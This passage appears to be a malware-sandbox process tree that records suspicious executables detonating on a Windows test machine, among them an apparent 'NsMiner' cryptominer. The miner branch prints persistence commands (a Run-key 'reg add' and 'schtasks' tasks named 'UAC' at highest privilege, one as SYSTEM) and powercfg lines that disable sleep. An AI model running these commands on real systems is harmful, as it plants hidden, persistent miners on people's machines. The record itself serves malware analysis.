C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"6⤵PID:7416
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:4880
-
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:4600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 1647⤵
- Program crash
PID:1992
-
-
-
-
-
C:\Users\Admin\Desktop\a\64.exe"C:\Users\Admin\Desktop\a\64.exe"4⤵PID:3560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0a5⤵PID:4600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 9365⤵PID:5488
-
C:\Windows\system32\chcp.comchcp 9366⤵PID:6060
-
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"4⤵PID:8576
-
C:\Users\Admin\AppData\Local\Temp\is-EBH1O.tmp\Kerish_Doctor_2022.tmp"C:\Users\Admin\AppData\Local\Temp\is-EBH1O.tmp\Kerish_Doctor_2022.tmp" /SL5="$703EA,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"5⤵PID:8424
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa1afbcc40,0x7ffa1afbcc4c,0x7ffa1afbcc583⤵PID:2800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:23⤵PID:3196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:33⤵PID:4796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1688 /prefetch:83⤵PID:2348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:13⤵PID:2076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:13⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4488 /prefetch:13⤵PID:1020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4644,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:83⤵PID:2872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:83⤵PID:4676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:83⤵PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:83⤵PID:4532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:83⤵PID:4676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:83⤵PID:2552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5160,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:23⤵PID:5644
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Windows directory
PID:6088 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x210,0x250,0x7ff6da6a4698,0x7ff6da6a46a4,0x7ff6da6a46b04⤵
- Drops file in Windows directory
PID:6108
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4792,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4284 /prefetch:13⤵PID:5288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3252,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3416 /prefetch:13⤵PID:5856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3260,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5456 /prefetch:13⤵PID:5932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4376,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4332 /prefetch:13⤵PID:4508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3312,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5460 /prefetch:83⤵PID:3672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4692,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5576 /prefetch:83⤵PID:2252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5636,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6828 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Executes dropped EXE
PID:6988 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6976
-
-
C:\Users\Admin\Desktop\a\00.exe"C:\Users\Admin\Desktop\a\00.exe"6⤵PID:4080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 3527⤵
- Program crash
PID:8076
-
-
-
C:\Users\Admin\Desktop\a\02.exe"C:\Users\Admin\Desktop\a\02.exe"6⤵PID:1992
-
C:\Users\Admin\Desktop\a\._cache_02.exe"C:\Users\Admin\Desktop\a\._cache_02.exe"7⤵PID:5368
-
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"6⤵PID:3088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe7⤵PID:3440
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe8⤵
- Kills process with taskkill
PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"7⤵PID:7568
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵PID:7616
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe8⤵PID:3052
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe9⤵
- Kills process with taskkill
PID:8528
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"8⤵PID:9068
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ8⤵PID:8968
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ9⤵PID:3992
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"8⤵PID:9184
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"9⤵
- Scheduled Task/Job: Scheduled Task
PID:8824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"8⤵PID:9192
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"9⤵
- Scheduled Task/Job: Scheduled Task
PID:3428
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0008⤵
- Power Settings
PID:5704 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 09⤵
- Power Settings
PID:212
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 09⤵
- Power Settings
PID:4680
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0009⤵
- Power Settings
PID:3408
-
-
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"6⤵PID:9136
-
C:\Users\Admin\AppData\Local\Temp\is-CORPK.tmp\Kerish_Doctor.tmp"C:\Users\Admin\AppData\Local\Temp\is-CORPK.tmp\Kerish_Doctor.tmp" /SL5="$90388,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"7⤵PID:4828
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5420 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Executes dropped EXE
PID:1600 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5656
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5612,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5628 /prefetch:83⤵PID:5796
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1140 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
PID:1484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:940
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6408 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
PID:3012 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1232
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
PID:4840 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6192
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1920 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
PID:6632 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3132
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6712 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
PID:6480 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6436
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6188 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
PID:5256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
PID:2136
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵PID:6596
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa2103cc40,0x7ffa2103cc4c,0x7ffa2103cc583⤵PID:1920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1736 /prefetch:23⤵PID:6540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2136 /prefetch:33⤵PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1564,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2160 /prefetch:83⤵PID:6696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3124 /prefetch:13⤵PID:5404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3172 /prefetch:13⤵PID:3228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4380,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4452 /prefetch:13⤵PID:1304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3508,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3980 /prefetch:13⤵PID:6404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4684,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4740 /prefetch:83⤵PID:3524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4036,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4756 /prefetch:83⤵PID:5380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3136,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3392 /prefetch:83⤵PID:5720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5148,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5156 /prefetch:83⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5184,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5160 /prefetch:83⤵PID:532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5156,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3108 /prefetch:83⤵PID:6860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4956,i,6364561878309789320,6645578307759926143,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5144 /prefetch:83⤵PID:1144
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵PID:9204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x7c,0x108,0x7ffa2103cc40,0x7ffa2103cc4c,0x7ffa2103cc583⤵PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1712,i,6726559503383079044,3111245654459475183,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1696 /prefetch:23⤵PID:8196
-
-
